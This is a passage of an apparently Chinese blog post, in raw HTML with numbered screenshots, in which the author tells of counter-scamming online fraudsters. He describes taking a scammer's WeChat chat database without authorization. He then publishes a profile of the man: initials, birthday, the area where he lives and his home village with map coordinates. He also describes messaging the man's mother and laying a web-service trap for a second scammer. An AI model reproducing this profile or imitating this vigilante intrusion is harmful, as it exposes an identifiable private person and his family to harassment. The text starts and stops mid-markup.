src="https://wechat2rss.xlab.app/img-proxy/?k=2a3c7e49&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn0qqm5l4AttJCOVFHSj03F0icibWFGuoLjX6JzyHu3D1Y6DZ6LYxxHYGQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">117</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.6972624798711755" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a94df432&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnDIUJibegia4yRpOkiaUwictzMachq5kJsgxRRfV8JDE0JJh1v7OyKibwSOw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">118</figcaption></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>金牌黑客的妈妈<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">第二天没事的时候我看了下金哥的wxdb，发现里面一条消息也没。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">虽然网吧电脑刚开始上线的时候瞥到过有两条消息，但是为啥表里是空的呢？我将原因总结为两条：1. 微信登录默认不勾选同步最近消息，金哥没特意去勾，估计电脑登微信就是为了手机复制我的下载地址到电脑。2. wechat的消息貌似也不是实时入库的，相当一部分内容不知道是在内存里还是怎么，账号或者进程退出时才会写库，我打包的是过程中的库，所以消息是空的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">消息是空的没关系，金哥的WeChat通讯录是全量的，我大体看了下，联系上金哥爸妈不是问题。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5546875" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=7d946a09&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnsbzUibq1zgghod0lUmLPibbEdG7gJbHObFXk6JX1BBZS8nTEwTXPCibibw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">119</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">结合通讯录里的好友、金哥关注的公众号、金哥的微信号，基本能确定金哥的大体人物建模。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRoh1cJ9oEONNVmlqr9ycey2SVmSdmQJoPopwmvgrDibBjqu7OXca1jBvzSotg4AjgHcgaHhV0M2gI7DTAVEic5jGq/640?wx_fmt=svg&#34;) 10px 10px / 40px no-repeat;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">姓名：缩写ylt<br/>生日：2003年9月1x号<br/>现在地：浙江嘉兴南湖区广益路与亚太路交汇处附近<br/>老家：河南省洛阳市伊川县平等乡龙王屯村<br/>标签：微信好友里是从鞋子武装到到内裤的各种A货商家<br/></code></pre><section><mp-common-poi class="js_editor_mppoi appmsg_poi_iframe custom_select_card js_uneditable" data-pluginname="poi" data-id="0.5505500150332271" data-name="%E9%BE%99%E7%8E%8B%E5%B1%AF%E6%9D%91" data-address="%E6%B2%B3%E5%8D%97%E7%9C%81%E6%B4%9B%E9%98%B3%E5%B8%82%E4%BC%8A%E5%B7%9D%E5%8E%BF%E5%B9%B3%E7%AD%89%E4%B9%A1" data-img="https%3A%2F%2Fmmbiz.qlogo.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnGticBUNhIBgRjVxzgMotLJWKQsy1FNhNNZLNDIodkFo13KapzXMlQ3Q%2F0%3Fwx_fmt%3Dpng" data-longitude="112.359489441" data-latitude="34.396900177" data-poiid="15539420489831220583" data-province="%E6%B2%B3%E5%8D%97" data-city="%E6%B4%9B%E9%98%B3%E5%B8%82" data-type="2" data-weui-theme="light"></mp-common-poi></section><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.14912280701754385" data-s="300,640" style="" data-type="jpeg" data-w="228" src="https://wechat2rss.xlab.app/img-proxy/?k=ba5fb346&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnveleuBq5LJAyibTClLvUkCNOnY0ZUG1fiawcgxUgJLRTs3Klu7dVnzCw%2F640%3Fwx_fmt%3Djpeg"/></p><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">120</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.10714285714285714" data-s="300,640" style="float: none;display: inline;" data-type="jpeg" data-w="308" src="https://wechat2rss.xlab.app/img-proxy/?k=bf17b316&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnK2G7dq07LKYTodiaytUIodlgwK08cuaNKhW99wPIiaU37xgAebTPvt2w%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">121</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.11254019292604502" data-s="300,640" style="" data-type="jpeg" data-w="311" src="https://wechat2rss.xlab.app/img-proxy/?k=1eba17b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnhMLQxJf2ubChb7iaM5QEK7XCUGzm8O5IqZBRrvRTnNw0NwvqibiaMD1Rw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">122</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.09821428571428571" data-s="300,640" style="" data-type="jpeg" data-w="336" src="https://wechat2rss.xlab.app/img-proxy/?k=32145aa3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnBBJV9SUBXzcYcgPxiaoicvg1bB086noXSicd1JjNvVIicibvZHQzyJpvIrw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">123</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.11014492753623188" data-s="300,640" style="" data-type="jpeg" data-w="345" src="https://wechat2rss.xlab.app/img-proxy/?k=539150a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnCLqSII8SPSLCy2VgYX2ib1OOnOvWUXF3zjRa1icEQWj7b3kJicyVgDX3Q%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">124</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.10682492581602374" data-s="300,640" style="" data-type="jpeg" data-w="337" src="https://wechat2rss.xlab.app/img-proxy/?k=fc15d610&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn8Crn1o2sKpyiadWibppr4Xb1lCmjibSMw7WIvAnCrSxhVyZlPMtoEqUSQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">125</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">其实现在这个局面也比较尴尬，虽然有点像是一个任意文件下载，但是其实他更像是一个SSRF，因为db虽然是金哥的东西，但是我却没1法直接干金哥一炮，db里的信息都是别人的。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">思来想去我决定直接找金哥他妈，算年龄金哥也得20了，害搁网络上弄这些坑人的营生，我得让他妈骂他一顿，让他遭受父母失望的眼光</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">！</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">当然了，金哥父母的性格、金哥跟父母的关系也都存在诸多可能，为了一次性把事情说清，我简单查询了一下金哥妈妈的信息，准备好了话术，联系到了她。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6256038647342995" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=bb3e479d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn7geuv966wcL0I1FdIoPWwRW8EEuxFrsYDY13Gpzz7PLuc5t0U6rXow%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">126</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我开门见山，金哥妈妈直接反问</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9637681159420289" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=6ad97663&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnsI67Incp6dqeZ1DicAXITyLHtXfc8yaZpZyKcTlLU9cr6QBEiaADfdNQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">127</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我直接把准备好的文字娓娓道来</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.318035426731079" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=152a4c60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnibJ6e4VwF7iaVOLtRFkS343C2qG0T2s3iaa3EMKHyGRGZXuvYEKn5zEjg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">128</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">发完我突然意识到金哥妈妈别再本身有啥身体不适，一下子让我给气过去，我特么岂不是又掉一坑里，话术当中没考虑这些，我赶紧中间插句话安抚下。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.533816425120773" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=3aaf159b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnswucH0doFFGxwlR1RQL6niaJTheEeckcZPp2uFXHptWia58QdOMwUiazw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">129</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">正常人肯定都会质疑我的身份，话术早就准备好了，几乎在金哥妈妈问我的同时我就把简单证明真实性的生日发过去了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.104669887278583" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=8ac7bd6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnvAvLXG9fvxYQS4zqkibbgLoppH20cWZTF7r6bpbaJ4rZPMoGM9tPTFg%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">130</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">其次是一波身份证明+主要证据。金哥家里亲戚的ID都是四字成语，整挺好。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="5.272141706924316" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=ef294e87&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnrKkicahJF3sFDIyAkzIqlJVKJ44HSw8pNgQQYQDibMsw1xZXAyLc5DAw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">131</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">最后又重申了一下要保重身体，别被我气到。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.25523349436392917" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=92daed0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnvMO5XrZl0VbxRK9CbINqtzC3Huf4xD26rCU2x480BdUXkAMYnVnVjA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">131-1</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我原本以为金哥妈妈会再有什么问题，或者给我什么回复，但是第一天没等到，到现在也没有等到。看金哥妈妈的朋友圈，属于是妈妈那个年龄段比较爱玩的那种风格，对自己的三个孩子也比较宠爱，会不会真的去找金哥问话、会不会责怪金哥、金哥会不会听，这些还真是不好说。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥妈妈问我金哥姓名时我没有回答，但是其实金哥妈妈朋友圈里有他的名字，那个视频是金哥18岁生日在酒店包场过生日的视频，房间里有精神小兄弟给他拉的横幅，巨大的圆桌周围摆了满满一圈百威啤酒，视频下有金哥配的励志格言：“等你攀登上一个新高度，你就会明白，有些翻篇，不靠心态翻，而是靠实力翻”。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">试着找到了金哥的两个抖音号，基本是那种半遮半掩想展示点自己不简单的那种风格，这倒是可以理解，谁都经历过那个年龄段。不过看了几个视频，金哥的衣服给我整震惊了，一会一件巴黎世家一会一件迪桑特，金哥妈妈搁家种地，金哥早外面穿巴宝莉？不过后来想到金哥通讯录里武装到内裤的A货商家后我就释然了一些，希望金哥的💰不是当TX客服挣得吧。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.2519548218940053" data-s="300,640" style="" data-type="jpeg" data-w="1151" src="https://wechat2rss.xlab.app/img-proxy/?k=df8dfabb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhntGQWsIQsyTicwy3UicxOj3hDRvvdwxvtq7q76Ree0U1yicJibdHWCiaFAqQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">132</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">其实原本我在气头上想直接把金哥信息不打码全发了，wxdb直接传个ipfs挂他一辈子。但是感受到金哥妈妈沉默的那一刻，我忽然心软了一下，屏幕那头的金哥妈妈当然有可能是完全不care我而非真的无言，但是我怕她跟我妈似的性格其实比较容易受伤害，想了想算了。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>第四波骗子 - 天津小伙</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">别走！还有，负一球！</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">还记得上文提到的在别人超话帖子下面留言的QQ群么？我加完群后管理员来私聊我，第一回我没继续回复消息，没过多久管理员就把我踢出了群并且把我屏蔽了。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.9395085066162571" data-s="300,640" style="" data-type="jpeg" data-w="1058" src="https://wechat2rss.xlab.app/img-proxy/?k=561a06b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnvv2OQmDPXiatCwicMlIZtmq12mnaTHlVZ73bFL5AGpLJ3lgXNOicG2G2g%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">133</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一直没回复消息的原因是后来我搭建好基础设施、写好剧本之后，想到了一种最不理想的可能性，那就是金牌黑客跟QQ群这个小哥是同一个人开展的不同业务形式，假设QQ群这边没有咬钩或者不小心给惊动了，我拿来当素材写文章的金牌黑客那边就比较难了，所以准备充分后我是先联系了金牌黑客。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是金牌黑客一开始没有理我，我只好双线并行也联系了QQ群这边，所以说两个故事在时间线上其实是交替进行的，为了把故事尽量写的清楚点就分开叙述了。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>不收外国钱<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">换个号加了QQ群，管理员胖头鱼来私聊我</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.6570048309178744" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=fd1a089a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn97lI1z6RFQJywlvqLCjHLANCLSY3ic8JaByBc9w6Uv6pMvibTcrX6B9g%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">134</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">话术纯纯不变，外行的话估计被他给唬的一愣一愣的。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.710950080515298" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=b7696c86&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhndBJThghaxeeOgEMmgXicIjfPspLVuL5guwDspdhu0dWzG3g3epA9GlQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">135</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">但是相对低调，只说自己是解封人员。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.6610305958132046" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=654b44c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4zKzaxh4yjfZlU5aWicgzN68dYYssDTYWQmmldFVSFGaAxlQXajqVQA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">136</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我简单描述下情况</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7004830917874396" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=c7eba4e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhngwO9PThaqeobyk26bC2Riaz8wxd5boK1vqpOhK6OPwJYoWp73ePvYaQ%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">137</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">大户有大户的苦衷</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5450885668276972" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=93468e4e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnxY44Il8bD9ARDUfYzQOfGkKH58qjoNtWVZH5GQYJ2icKp4UcYTWjuicA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">138</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">小小露富</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.3285024154589373" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=ce5bf7ce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnWeicqMamk8JA5icDIlpRcQyMZbLth5ADsJ0NBCtgGoHqL1Gxibg7jHBbw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">139</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">软硬兼施</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5797101449275361" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=bb2b7760&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnqbOeNlIQPgjy62PLKQNy5WmCEsibOu1yG1eQ87jObV4WiaElAfjKpLww%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">140</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">不仅web服务那边毛请求都没收到，胖头鱼大哥他妈的给我来一句<strong style="font-weight: bold;color: black;">《不 收 外 国 钱》</strong>。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5152979066022545" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=58f5d47a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnb78GuJHtMibuZicnqu6Tq0V1UpDnOtibkTsUCxc1vUcRfnN4icUwXJ8yug%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: 